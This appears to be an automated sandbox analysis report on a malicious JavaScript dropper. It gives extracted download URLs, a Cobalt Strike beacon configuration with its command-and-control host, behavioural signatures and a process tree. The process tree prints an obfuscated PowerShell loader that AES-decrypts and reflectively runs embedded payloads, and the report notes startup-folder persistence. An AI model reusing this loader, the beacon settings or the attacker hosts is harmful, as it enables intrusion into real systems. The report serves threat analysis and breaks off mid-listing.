Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system -
submitted
11-04-2024 01:35
Static task
static1
Behavioral task
behavioral1
Sample
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
Resource
win10v2004-20240226-en
General
-
Target
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
-
Size
718KB
-
MD5
6c0c25445827a1bb55a7b7a53a2173e0
-
SHA1
2e34cc5a0e8d276b5288f4ba493bf36e26d7d51c
-
SHA256
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24
-
SHA512
fa974a3ff032cacf4072eed7ad4def358fabb8d186b5c9b0b50f85c2fd9b337a9c29c5cda0a853abcce9042f7bce8a8f2b991870e9892f4ba51be8b22166f451
-
SSDEEP
384:CqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbW:5mmmmmmmmmmmmmmmmmmW
Malware Config
Extracted
https://store3.gofile.io/download/direct/e63cd175-a3bf-4fbc-87b6-8c237ace143e/hays_compiled_files.pdf
https://store3.gofile.io/download/direct/55478873-a42c-46f8-b63b-60c5031fa485/vad.cmd
Extracted
cobaltstrike
666
http://samsunguniverse.com:443/wp-content/unsalted-condensed-soups/
-
access_type
512
-
beacon_type
2048
-
dns_idle
6.7372036e+07
-
dns_sleep
8.1297408e+08
-
host
samsunguniverse.com,/wp-content/unsalted-condensed-soups/
-
http_header1
AAAACgAAAF1BY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCwqLyo7cT0wLjgAAAAKAAAAH0FjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUAAAAKAAAAIkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZSwgYnIAAAAKAAAAFkNvbm5lY3Rpb246IGtlZXAtYWxpdmUAAAAHAAAAAAAAAA8AAAANAAAAAQAAAAkvc291cC5naWYAAAAMAAAAAAAAAA==
-
http_header2
AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAATXsiaW1hZ2VfdXJsIiA6ICJodHRwOi8vbWVtZXNtaXgubmV0L21lZGlhL2NyZWF0ZWQvam9vd2RqLmpwZyIsICJhdXRoZGF0YSIgOiAiAAAAAQAAAAIifQAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
-
jitter
7680
-
maxdns
235
-
polling_time
60000
-
port_number
443
-
sc_process32
%windir%\syswow64\dfrgui.exe
-
sc_process64
%windir%\sysnative\dfrgui.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCF4otg7PLqPK9DRHSRAWCg2RQ4hXLImgcCXikvdf4N9sFBrpIEQsznrImUwv+9q+7voFNWL8Kh+mkeF+bGKcQCczSXFkKpPYvwwOEQeT8lPfiFAkT/eNHDuZY/xrjA4VMmgBRM3qvPbgi9lCPfOowsx6njNPJIeuQufRDk7p5u5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
3.154317312e+09
-
unknown2
AAAABAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/imagedata/
-
user_agent
Mozilla/5.0 (X11; CrOS x86_64 13597.94.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.186 Safari/537.36
-
watermark
666
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 2 IoCs
Processes: wscript.exe, powershell.exe
flow | pid | process
3 | 4660 | wscript.exe
10 | 4728 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: wscript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | wscript.exe
-
Drops startup file 1 IoCs
Processes: powershell.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command.lnk | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
5736 | 1228 | WerFault.exe | powershell.exe
-
Delays execution with timeout.exe 1 IoCs
Processes: timeout.exe
pid | process
5776 | timeout.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 3 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes: powershell.exe, msedge.exe, identity_helper.exe
pid | process | entries
4728 | powershell.exe | 5
428 | msedge.exe | 2
4904 | msedge.exe | 2
540 | identity_helper.exe | 2
1228 | powershell.exe | 3
1800 | powershell.exe | 3
5220 | msedge.exe | 4
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes: msedge.exe
pid | process | entries
4904 | msedge.exe | 7
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.exe
description | pid | process
Token: SeDebugPrivilege | 4728 | powershell.exe
Token: SeDebugPrivilege | 1228 | powershell.exe
Token: SeDebugPrivilege | 1800 | powershell.exe
-
Suspicious use of FindShellTrayWindow 25 IoCs
Processes: msedge.exe
pid | process | entries
4904 | msedge.exe | 25
-
Suspicious use of SendNotifyMessage 24 IoCs
Processes: msedge.exe
pid | process | entries
4904 | msedge.exe | 24
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: wscript.exe, powershell.exe, msedge.exe
description | pid | process | target process
PID 4660 wrote to memory of 4728 | 4660 | wscript.exe | powershell.exe
PID 4728 wrote to memory of 4904 | 4728 | powershell.exe | msedge.exe
PID 4904 wrote to memory of 4764 | 4904 | msedge.exe | msedge.exe
PID 4904 wrote to memory of 1568 | 4904 | msedge.exe | msedge.exe
PID 4904 wrote to memory of 428 | 4904 | msedge.exe | msedge.exe
PID 4904 wrote to memory of 4792 | 4904 | msedge.exe | msedge.exe
(64 entries in total; identical rows are listed once)
Processes
-
Level 1: C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\hays_compiled_files.pdf
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bdcb46f8,0x7ff9bdcb4708,0x7ff9bdcb4718
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4292 /prefetch:6
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
-
Level 4: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3856 /prefetch:2
- Suspicious behavior: EnumeratesProcesses
-
Level 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\command.cmd"
-
Level 4: C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\command.cmd
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\command.cmd';$NpTc='ElPDuQePDuQmPDuQePDuQnPDuQtAPDuQtPDuQ'.Replace('PDuQ', ''),'CoXPYZpyXPYZToXPYZ'.Replace('XPYZ', ''),'CrEMSSeaEMSStEMSSeDEMSSecEMSSrEMSSypEMSStoEMSSrEMSS'.Replace('EMSS', ''),'DeBhMIcoBhMImBhMIpreBhMIsBhMIsBhMI'.Replace('BhMI', ''),'MjUaaaijUaanMjUaaodujUaaljUaaejUaa'.Replace('jUaa', ''),'CCTRRhaCTRRnCTRRgCTRReECTRRxteCTRRnsCTRRioCTRRnCTRR'.Replace('CTRR', ''),'ReUTwVaUTwVdUTwVLUTwVinUTwVesUTwV'.Replace('UTwV', ''),'GeAhBRtAhBRCuAhBRrAhBRrAhBRentAhBRPrAhBRocAhBRessAhBR'.Replace('AhBR', ''),'FricxOoicxOmBicxOaseicxO6icxO4icxOSicxOtricxOingicxO'.Replace('icxO', ''),'TpxparapxpansfpxpaopxparmFpxpainpxpaapxpalBpxpalopxpacpxpakpxpa'.Replace('pxpa', ''),'SBHHKpBHHKliBHHKtBHHK'.Replace('BHHK', ''),'EnJJQstJJQsryJJQsPoiJJQsntJJQs'.Replace('JJQs', ''),'LoaFmxRdFmxR'.Replace('FmxR', ''),'InrHcCvrHcCokerHcC'.Replace('rHcC', '');powershell -w hidden;function HrNbd($IYBxP){$sIDrs=[System.Security.Cryptography.Aes]::Create();$sIDrs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$sIDrs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$sIDrs.Key=[System.Convert]::($NpTc[8])('YlLuUQlq2zooTkmMvubkG6nmi6eEQu+hG3qKzUo3LiI=');$sIDrs.IV=[System.Convert]::($NpTc[8])('5WjxBcRpNDZeOHu0UleMXg==');$auMon=$sIDrs.($NpTc[2])();$sLVMy=$auMon.($NpTc[9])($IYBxP,0,$IYBxP.Length);$auMon.Dispose();$sIDrs.Dispose();$sLVMy;}function DWPGe($IYBxP){$eIWUL=New-Object System.IO.MemoryStream(,$IYBxP);$RadhF=New-Object System.IO.MemoryStream;$iIZvs=New-Object System.IO.Compression.GZipStream($eIWUL,[IO.Compression.CompressionMode]::($NpTc[3]));$iIZvs.($NpTc[1])($RadhF);$iIZvs.Dispose();$eIWUL.Dispose();$RadhF.Dispose();$RadhF.ToArray();}$zaBiQ=[System.IO.File]::($NpTc[6])([Console]::Title);$zusSU=DWPGe (HrNbd ([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 5).Substring(2))));$FxKCT=DWPGe (HrNbd 
([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 6).Substring(2))));[System.Reflection.Assembly]::($NpTc[12])([byte[]]$FxKCT).($NpTc[11]).($NpTc[13])($null,$null);[System.Reflection.Assembly]::($NpTc[12])([byte[]]$zusSU).($NpTc[11]).($NpTc[13])($null,$null); "5⤵
-
Level 5: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 6: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 2756
- Program crash
-
Level 5: C:\Windows\system32\timeout.exe
Command line: timeout /nobreak /t 1
- Delays execution with timeout.exe
-
Level 1: C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
-
Level 1: C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
-
Level 1: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1228 -ip 1228
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B
MD5
e1b45169ebca0dceadb0f45697799d62
SHA1
803604277318898e6f5c6fb92270ca83b5609cd5
SHA256
4c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60
SHA512
357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B
MD5
9ffb5f81e8eccd0963c46cbfea1abc20
SHA1
a02a610afd3543de215565bc488a4343bb5c1a59
SHA256
3a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc
SHA512
2d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB
MD5
9a58cc9ef5899fc362abe2d35611dbed
SHA1
b1e688f44a2db18edc82c45816f13516673bdfb6
SHA256
68dbaa0b1e4969d425cd0dceef7b24a55f3492a00a98418ca52ca2e668da9268
SHA512
4989bbd467f729f9b0728cc09dd451463b0f191748cd0fa49202f1c92642cb80f73a3ff0bb5af7d4a2df0453369dc817742d43b598fe5b82cf5b357a4837561a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB
MD5
07864350659c24bf2bd446577c45ebf8
SHA1
92ce91edc35f9303f19dcc0ffc1ad3451ba5094d
SHA256
50efabbef8bc0160b0aefba0123a30fa372a015af43ff67ecb2c6a2632fc32ae
SHA512
cbdf2c56335478174b050cb4872fab417fc4a7fbeef091b619b7d1b6eb889224ac58c92b48dbc9bdb598fc159c3a8ff1986c40ea36889899726dafc494ab5d50
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B
MD5
6752a1d65b201c13b62ea44016eb221f
SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB
MD5
79b027541db1ad564a21390107c7f886
SHA1
97f16b655e80f135aa9ead6b064098f4f5b6d9b0
SHA256
a065509e00cd89c69be405cbb238d90763623f11aeaee68f7ec6e182601e89df
SHA512
9d7f679b853489664ae26ca1e859914f306d4e6d5fdb320e6117cece6d9d6c5c398ee94693e4b4e5985312997b8a2356b24d07749637cd5943b81f0cda052298
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oba5roke.drm.ps1
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1
Filesize
1013B
MD5
2c7158e980eed64c5ff47d7e1af46966
SHA1
3584bcb349acc947e0a565d39afedc2c670ebcb0
SHA256
47946ccee313a6703eb0b46514b81f521ab75d359a2688888f1a8270607ab82d
SHA512
158b68e1fef58a241dd2c18fd2c669b3feb254152192156c41f49ee0195ab99489771b1e0c1bb3a5bd508ccb5df93e2a01e54afe620b11eaa97976e22e7e79dd
-
C:\Users\Admin\command.cmd
Filesize
227KB
MD5
be02c96648bc9e8ba58f7dbe6f714248
SHA1
ba96bb998e57f72f0d7980a3e5d4b3cbdefc5156
SHA256
cd3f42f22f5740cea8ac38e22aeb3b67e4e059fe97e06716fa172dab3d425272
SHA512
877d9b28718bdfc15748423554f278bea14a880a2e9a103456d71e492385b770e05b2f08e1382d44792879d672b608e15ee7dbe76ed54932797a0fecd4c3207b
-
C:\Users\Admin\hays_compiled_files.pdf
Filesize
650KB
MD5
cbd995f45ee2a2274a2a69c2ff3660e9
SHA1
1236d8111103f0a01962c4d6b2e54585da3f616b
SHA256
c74437edd6600c95b08123b1fd605686d666995d0535bb48483c7055e2f1ebc3
SHA512
2b6543e217ac1b24141abb8d2392bf02f1a46ead7562cc7200f3af96adde8f09a9eca07aec674654f2ab6ba77eabb8eaafd0692ae50466cc1de0405b02b1d0f3
-
\??\pipe\LOCAL\crashpad_4904_EAIMVJGAZNDEXZJD
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1228-72-0x0000000006080000-0x00000000063D4000-memory.dmp
Filesize
3.3MB
-
memory/1228-80-0x00000000078A0000-0x00000000078BA000-memory.dmp
Filesize
104KB
-
memory/1228-49-0x0000000005070000-0x00000000050A6000-memory.dmp
Filesize
216KB
-
memory/1228-50-0x0000000074F40000-0x00000000756F0000-memory.dmp
Filesize
7.7MB
-
memory/1228-51-0x0000000005210000-0x0000000005220000-memory.dmp
Filesize
64KB
-
memory/1228-52-0x0000000005210000-0x0000000005220000-memory.dmp
Filesize
64KB
-
memory/1228-53-0x0000000005850000-0x0000000005E78000-memory.dmp
Filesize
6.2MB
-
memory/1228-142-0x0000000074F40000-0x00000000756F0000-memory.dmp
Filesize
7.7MB
-
memory/1228-60-0x0000000005730000-0x0000000005752000-memory.dmp
Filesize
136KB
-
memory/1228-61-0x0000000005F30000-0x0000000005F96000-memory.dmp
Filesize
408KB
-
memory/1228-64-0x0000000006010000-0x0000000006076000-memory.dmp
Filesize
408KB
-
memory/1228-141-0x0000000005210000-0x0000000005220000-memory.dmp
Filesize
64KB
-
memory/1228-73-0x0000000006510000-0x000000000652E000-memory.dmp
Filesize
120KB
-
memory/1228-74-0x0000000006540000-0x000000000658C000-memory.dmp
Filesize
304KB
-
memory/1228-77-0x0000000007630000-0x0000000007674000-memory.dmp
Filesize
272KB
-
memory/1228-78-0x0000000007800000-0x0000000007876000-memory.dmp
Filesize
472KB
-
memory/1228-79-0x0000000007F00000-0x000000000857A000-memory.dmp
Filesize
6.5MB
-
memory/1228-131-0x0000000005210000-0x0000000005220000-memory.dmp
Filesize
64KB
-
memory/1228-129-0x0000000074F40000-0x00000000756F0000-memory.dmp
Filesize
7.7MB
-
memory/1228-114-0x0000000070940000-0x0000000070ABB000-memory.dmp
Filesize
1.5MB
-
memory/1228-113-0x0000000070940000-0x0000000070ABB000-memory.dmp
Filesize
1.5MB
-
memory/1228-111-0x0000000007AF0000-0x0000000007B24000-memory.dmp
Filesize
208KB
-
memory/1228-100-0x0000000007A40000-0x0000000007A6E000-memory.dmp
Filesize
184KB
-
memory/1228-101-0x0000000007980000-0x000000000798C000-memory.dmp
Filesize
48KB
-
memory/1228-102-0x0000000000400000-0x000000000044B000-memory.dmp
Filesize
300KB
-
memory/1228-109-0x0000000000400000-0x000000000044B000-memory.dmp
Filesize
300KB
-
memory/1800-99-0x0000000074F40000-0x00000000756F0000-memory.dmp
Filesize
7.7MB
-
memory/1800-83-0x0000000003470000-0x0000000003480000-memory.dmp
Filesize
64KB
-
memory/1800-82-0x0000000003470000-0x0000000003480000-memory.dmp
Filesize
64KB
-
memory/1800-81-0x0000000074F40000-0x00000000756F0000-memory.dmp
Filesize
7.7MB
-
memory/4728-13-0x00000241F3120000-0x00000241F3130000-memory.dmp
Filesize
64KB
-
memory/4728-9-0x00007FF9C7C00000-0x00007FF9C86C1000-memory.dmp
Filesize
